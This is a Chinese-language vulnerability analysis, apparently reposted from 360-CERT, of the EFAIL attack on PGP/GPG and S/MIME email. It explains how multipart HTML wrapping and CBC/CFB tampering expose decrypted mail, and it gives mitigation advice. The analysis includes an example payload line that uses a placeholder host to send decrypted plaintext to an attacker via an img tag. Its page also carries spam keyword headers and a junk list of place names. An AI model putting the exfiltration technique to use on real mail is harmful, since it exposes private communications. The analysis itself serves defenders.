91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行EFAIL中的PGP/GPG和S/MIME漏洞分析

發布時間:2021-12-28 14:50:58 來源:億速云 閱讀:180 作者:柒染 欄目:大數據

如何進行EFAIL中的PGP/GPG和S/MIME漏洞分析,針對這個問題,這篇文章詳細介紹了相對應的分析和解答,希望可以幫助更多想解決這個問題的小伙伴找到更簡單易行的方法。

0x00 漏洞背景

PGP/GPG 和 S/MIME是為電子郵件提供端到端安全的兩個重要標準。

14日,歐洲安全研究員Sebastian Schinzel在twitter對 PGP/GPG 和 S/MIME 進行了漏洞預警,隨后細節被公開。

360-CERT對漏洞持續關注,并對漏洞進行了詳細分析。

0x01 漏洞詳情

電子郵件客戶端對郵件內容展示有多種方式,其中HTML渲染是最流行的一種。HTML支持網絡資源的請求,例如<img/> 、<input/>、<script><scirpt />等。

本次EFAIL攻擊就是借助的<img />標簽的src屬性,將解密后的原文發送到攻擊者控制的遠程服務器上,從而造成信息泄露。

漏洞根本的原因,是因為電子郵件客戶端在處理multipart郵件的時候,對每一個multipart獨立處理,而在顯示的時候,會將多multipart郵件的渲染到同一個HTML里面。這樣在郵件顯示的時候,明文和解密后的原文將在一起顯示,在這里會有安全隱患。

0x02 滲透攻擊

在電子郵件中允許多段存在,如圖所示:

如何進行EFAIL中的PGP/GPG和S/MIME漏洞分析

其中multipart進行多part標識,protocol進行配置,同時使用boundary進行分割。

郵件客戶端處理郵件時,會對每個part獨立處理,但是最后將渲染到同一個HTML界面中。這樣我們可以構造如下PoC來利用該特性:

如何進行EFAIL中的PGP/GPG和S/MIME漏洞分析

可以看到,PoC中利用boundary將郵件分為了三部分,分別為Content-Type: text/html ,Content-Type: multipart/encrypted;protocol="application/pgp-encrypted"; ,和 Content-Type: text/html 。

  • 第一部分,定義一個img標簽,src中為攻擊者接受郵件明文的遠程主機。注意:在這里,src的引號和img的/>不閉合。

  • 第二部分,為使用端到端加密后的郵件主體。

  • 第三部分,對第一部分的標簽進行閉合。

因為郵件客戶端對每個multipart獨立處理,在這個過程中會對加密郵件進行解密。當受害者打開郵件的時,進行解密渲染,最后該郵件將解析為:

<img src="http://x.x.x.x/郵件明文">

這樣的內容在受害者電子郵件客戶端顯示的時候,會發起http請求,將加密的郵件原文發往攻擊者主機。

0x03 S/MIM缺陷

如果S/MIME采用CBC或者CFB模式,那么將會受到EFAIL攻擊。

以CBC為例,CBC模式里是分段明文,每段數據都是通過頭部與上一段密文亦或進行加密的。如下圖所示:

如何進行EFAIL中的PGP/GPG和S/MIME漏洞分析

在(a)這里, 有已知數據IV,C0,P0, 整個揭秘過程會自動亦或后得到C2,C3的部分,也就是我們想要伸出的目標數據unknown plaintext。

攻擊邏輯很簡單,將已知的頭部標記(明文段"Content-type")的密文部分篡改為img標簽,把加密的密文包裹起來。這樣在解析顯示的時候會達到和第一種方法相同的攻擊效果。

如何進行EFAIL中的PGP/GPG和S/MIME漏洞分析

CFB模式和 CBC 類似,都必須要知道加密內容一部分明文,逐步替換插入 img 標簽,最終達到攻擊的目的。

0x04 漏洞演示

漏洞有許多攻擊場景,例如中間人攻擊。

如何進行EFAIL中的PGP/GPG和S/MIME漏洞分析

攻擊者作為中間人劫持到郵件流量,在加密的郵件點前后添加multipart。用戶受到郵件打開后,明文內容將被img標簽發送給攻擊者。達到加密郵件泄露的效果:

如何進行EFAIL中的PGP/GPG和S/MIME漏洞分析

0x05 漏洞影響面

漏洞影響包括window,linux, 安卓,IOS等在內的多平臺多應用,具體影響范圍如下圖所示:

如何進行EFAIL中的PGP/GPG和S/MIME漏洞分析

0x05 安全建議

漏洞雖然影響氛圍廣,但是利用難度大。

目前沒有針對該漏洞的修復補丁,所以在漏洞修復之前,請廣大用戶立即禁用或卸載自動解密 PGP加密電子郵件的工具。不要閱讀PGP加密的郵件。

關于如何進行EFAIL中的PGP/GPG和S/MIME漏洞分析問題的解答就分享到這里了,希望以上內容可以對大家有一定的幫助,如果你還有很多疑惑沒有解開,可以關注億速云行業資訊頻道了解更多相關知識。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

海南省| 远安县| 合水县| 淮滨县| 吉隆县| 普安县| 嘉定区| 犍为县| 青冈县| 独山县| 伊春市| 安龙县| 内丘县| 黄石市| 犍为县| 徐水县| 济宁市| 怀仁县| 建阳市| 扶沟县| 梁山县| 本溪市| 白山市| 张家口市| 阜宁县| 东台市| 尤溪县| 淮安市| 丹东市| 桑植县| 永春县| 延边| 习水县| 松江区| 民丰县| 新兴县| 陈巴尔虎旗| 潢川县| 张北县| 大石桥市| 呈贡县|